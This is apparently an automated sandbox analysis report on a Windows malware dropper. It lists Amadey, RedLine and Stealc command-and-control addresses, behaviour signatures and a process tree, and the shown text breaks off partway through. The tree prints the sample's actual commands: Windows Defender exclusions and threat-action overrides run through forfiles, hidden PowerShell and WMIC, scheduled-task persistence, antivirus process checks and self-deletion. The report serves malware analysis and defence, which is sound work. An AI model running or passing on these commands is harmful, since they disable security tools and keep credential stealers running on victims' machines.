Analysis

  • max time kernel
    299s
  • max time network
    295s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:37

General

  • Target

    780f03d6362010dcdd04a0f022551e0f3518afe8d2a7cf7af25498948b82b706.exe

  • Size

    1.8MB

  • MD5

    bc2ef7e91da0d7f25f717e198df53da6

  • SHA1

    9f3c32e91fa08261b51d0c1cbb937ff812f7726c

  • SHA256

    780f03d6362010dcdd04a0f022551e0f3518afe8d2a7cf7af25498948b82b706

  • SHA512

    d86ce1fbc5ddc566435cde70811519a92b97045fe44dd175ea65677d534d4e05daa1d9d40e7641cf0cb820c66e818b2abaae4680d94acb96167ea9baee1602d2

  • SSDEEP

    49152:sBojij556rIWMZU/XX4rfD2lxrgQ1cgTGQE18c15FV:3et5uSU/XufDSrVlFc1R

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • .NET Reactor proctector 6 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 40 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 36 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1388
      • C:\Users\Admin\AppData\Local\Temp\780f03d6362010dcdd04a0f022551e0f3518afe8d2a7cf7af25498948b82b706.exe
        "C:\Users\Admin\AppData\Local\Temp\780f03d6362010dcdd04a0f022551e0f3518afe8d2a7cf7af25498948b82b706.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2320
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:2660
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                5⤵
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2128
            • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
              "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1656
              • C:\Users\Admin\AppData\Roaming\68uv4rRT1S.exe
                "C:\Users\Admin\AppData\Roaming\68uv4rRT1S.exe"
                5⤵
                • Executes dropped EXE
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1928
              • C:\Users\Admin\AppData\Roaming\qV21zx2mFp.exe
                "C:\Users\Admin\AppData\Roaming\qV21zx2mFp.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2948
            • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1528
              • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1468
                • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  PID:1060
                  • C:\Users\Admin\AppData\Local\Temp\service123.exe
                    "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:332
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3756
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2288
            • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
              "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1372
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                5⤵
                • Executes dropped EXE
                PID:948
            • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
              "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
            • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
              "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2480
              • C:\Users\Admin\AppData\Local\Temp\filename.exe
                "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2416
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "filename.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\filename.exe" & exit
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:3624
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "filename.exe" /f
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1984
            • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
              "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              PID:1980
            • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2348
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              PID:580
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1696
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2220
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa opssvc"
                  6⤵
                    PID:3032
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2856
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    6⤵
                      PID:2740
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 607698
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:448
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "MaskBathroomCompositionInjection" Participants
                      6⤵
                        PID:3044
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                        6⤵
                          PID:2296
                        • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                          Waters.pif Q
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2488
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                            PID:2944
                      • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2156
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2128
                      • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2348
                        • C:\Users\Admin\AppData\Local\Temp\7zS944.tmp\Install.exe
                          .\Install.exe
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:1140
                          • C:\Users\Admin\AppData\Local\Temp\7zSB18.tmp\Install.exe
                            .\Install.exe /RNXdidDHt "385121" /S
                            6⤵
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Enumerates system info in registry
                            PID:1440
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              7⤵
                                PID:880
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:532
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    9⤵
                                      PID:2360
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                        10⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2168
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:1912
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      9⤵
                                        PID:2140
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                          10⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1868
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:2616
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        9⤵
                                          PID:2028
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            10⤵
                                              PID:1700
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          8⤵
                                          • Indirect Command Execution
                                          PID:312
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            9⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1344
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              10⤵
                                                PID:1896
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            8⤵
                                            • Indirect Command Execution
                                            PID:1768
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              9⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:796
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                10⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:332
                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                  11⤵
                                                    PID:2920
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                            7⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:2984
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              8⤵
                                                PID:2396
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  9⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1984
                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                    10⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1896
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\jsMCGFl.exe\" PV /DcTPdidOTFD 385121 /S" /V1 /F
                                              7⤵
                                              • Drops file in Windows directory
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2116
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 556
                                              7⤵
                                              • Loads dropped DLL
                                              • Program crash
                                              PID:2828
                                      • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                        4⤵
                                        • Drops startup file
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Adds Run key to start application
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: AddClipboardFormatListener
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2156
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:736
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2148
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1688
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2180
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                          5⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:3292
                                        • C:\Users\Admin\AppData\Local\Temp\jkonwz.exe
                                          "C:\Users\Admin\AppData\Local\Temp\jkonwz.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:476
                                        • C:\Users\Admin\AppData\Local\Temp\kqduvv.exe
                                          "C:\Users\Admin\AppData\Local\Temp\kqduvv.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:2572
                                        • C:\Users\Admin\AppData\Local\Temp\zhthfl.exe
                                          "C:\Users\Admin\AppData\Local\Temp\zhthfl.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:3908
                                      • C:\Users\Admin\AppData\Local\Temp\1000308001\f7c7316cfb.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000308001\f7c7316cfb.exe"
                                        4⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Loads dropped DLL
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • System Location Discovery: System Language Discovery
                                        • Checks processor information in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2060
                                      • C:\Users\Admin\AppData\Local\Temp\1000309001\6c556e6268.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000309001\6c556e6268.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2276
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                          5⤵
                                            PID:2404
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                              6⤵
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:1972
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.0.465905787\495706301" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce6fd98a-f4c4-4524-b9f3-f15355be305e} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 1300 105ed758 gpu
                                                7⤵
                                                  PID:2092
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.1.60061891\605164800" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df95872f-6125-4bdc-ad18-cee744c97e92} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 1500 4293258 socket
                                                  7⤵
                                                    PID:2884
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.2.1363521931\2108277296" -childID 1 -isForBrowser -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {488079ff-5ee7-4848-b38c-310bbba06ff3} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 2244 19f72958 tab
                                                    7⤵
                                                      PID:264
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
